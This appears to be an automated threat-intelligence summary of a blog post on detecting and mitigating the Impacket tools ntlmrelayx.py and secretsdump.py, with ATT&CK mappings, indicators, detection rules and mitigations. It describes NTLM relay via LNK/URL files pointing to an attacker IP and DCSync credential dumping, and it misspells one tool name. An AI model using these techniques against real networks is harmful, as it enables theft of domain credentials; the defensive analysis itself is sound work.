Full Report
Jordan Drysdale // Overview The following description of some of Impacket’s tools and techniques is a tribute to the authors, SecureAuthCorp, and the open-source effort to maintain and extend the code. […] The post Impacket Defense Basics With an Azure Lab appeared first on Black Hills Information Security, Inc..
Analysis Summary
# Tool/Technique: Impacket Toolkit (Focusing on ntlmrelayx.py and secretsdump.py)
## Overview
Impacket is a collection of Python classes that implements network protocols commonly used in Windows environments (like SMB, Kerberos, MSSQL, LDAP, NTLM). The article specifically discusses its offensive capabilities, focusing on detection and defense against tools like `ntlmrelayx.py` for relay attacks and `secretsdump.py` for credential dumping, particularly targeting Active Directory environments.
## Technical Details
- Type: Tool/Framework (Library of tools)
- Platform: Windows (Targeted environments, typically Active Directory infrastructure)
- Capabilities: Network protocol interaction, relay attacks (NTLM), credential dumping (LSASS, NTDS.dit).
- First Seen: Not specified in the context (Impacket has been around for a long time).
## MITRE ATT&CK Mapping
- **T1105 - Ingress Tool Transfer** (Implied, as offensive tools are often used post-initial compromise)
- **T1557 - Man-in-the-Middle** (As demonstrated by `ntlmrelayx.py`)
- **T1557.001 - Network Relay** (Specifically related to `ntlmrelayx.py` relaying NTLM hash submissions)
- **T1003 - OS Credential Dumping** (Related to `secretsdump.py` usage)
- **T1003.001 - LSASS Memory** (Implied usage for dumping credentials from memory)
- **T1003.006 - DCSync** (Specific sub-technique mentioned for NTDS.dit capture via `secretsdump.py`)
## Functionality
### Core Capabilities
**Impacket (General):** Provides Python libraries to implement various Windows networking protocols for testing and security auditing.
**ntlmrelayx.py:** Used to capture and relay NTLM authentication hashes. The article highlights its use in conjunction with LNK or URL file artifacts to trigger silent credential relay against an attacker's listening relay, aiming for privilege escalation by capturing Domain Administrator credentials.
**secretsdump.py:** Used for retrieving sensitive credential data. Specific mention is made of its use to target the **NTDS.dit** file via **DCSync** to acquire offline domain hashes.
### Advanced Features
**NTLM Relay:** Silently submitting captured authentication hashes to target services (like Domain Controllers) to authenticate as the compromised user without knowing the plaintext password.
**DCSync Synchronization:** Utilizing the Directory Replication Service Remote Protocol (MS-DRSR via SMB/RPC) to request replication data from the DC Backup Operator/Replicator role, allowing the extraction of the entire AD database (NTDS.dit).
## Indicators of Compromise
- File Hashes: N/A (Tool execution, not a specific malware file hash provided)
- File Names: `ntlmrelaxy.py`, `secretsdump.py` (When executed)
- Registry Keys: N/A
- Network Indicators: (Focus is on the *method* of attack, not static C2)
- Relaying authentication attempts to an adversary-controlled IP address (e.g., `\\10.0.0.8\@threat.png`).
- SMB/RPC traffic associated with DCSync access (usually inbound to the DC on port 445).
- Behavioral Indicators:
- **LNK/URL Files:** Creation or access of shortcuts/web links pointing to network paths containing an `@` symbol followed by an attacker-controlled IP/hostname (e.g., targeting `\\IP_ADDRESS@filename`).
- **Process Execution:** Invocations of `secretsdump.py` or command patterns suggesting LSASS access (e.g., Windows event ID 4688 on processes using tools to interact with `\\.\pipe\lsass` or starting the `RemoteRegistry` service).
- **DCsync Activity:** Any non-DC account attempting Directory Replication Service Remote Protocol requests (DCSync) against the Domain Controller.
## Associated Threat Actors
The article focuses on the tool's use by penetration testers/adversaries in general, not specific named threat groups. Impacket is a commonly used tool across the cybersecurity landscape by both red teams and malicious actors.
## Detection Methods
- Signature-based detection: Detecting known paths or command-line arguments associated with executing the Python scripts (`Impacket`).
- Behavioral detection:
- **Sysmon:** Creating matches against `.URL` and `.LNK` file creations for detection of the relay trigger vector.
- **Security Event Logging:** Scrutinizing **Windows Event ID 4688** (Process Creation) for invocations attempting remediation/dumping (e.g., starting `RemoteRegistry` service).
- **Network Monitoring:** Detecting abnormal SMB/RPC traffic targeting DCs from non-standard sources that resembles DCSync initiation.
## Mitigation Strategies
- **For LNK/URL Relay Attacks (ntlmrelayx.py):**
- **File Server Resource Manager (FSRM):** Configure FSRM on file shares to limit allowed file extensions, preventing the execution/triggering of harmful files.
- **Network Segmentation:** Narrow access control to file shares where possible.
- **For Credential Dumping (secretsdump.py/DCSync):**
- **Firewalling:** Limit SMB RPC access (Port 445) to Domain Controllers only from trusted administrative or backup infrastructure hosts.
- **Monitoring:** Scrutinize all DCSync operations performed by non-DC entities.
- **Principle of Least Privilege:** Ensure only authorized services/accounts (like backup systems) have the necessary permissions to perform directory replication or access LSASS memory.
## Related Tools/Techniques
- **Deploy-Deception Toolkit:** Used to create controlled objects in Active Directory specifically for detecting enumeration and Kerberoasting attempts which often precede credential dumping.
- **Olaf’s Sysmon-Modular:** Provides pre-configured Sysmon rules useful for detecting LNK/URL file proliferation.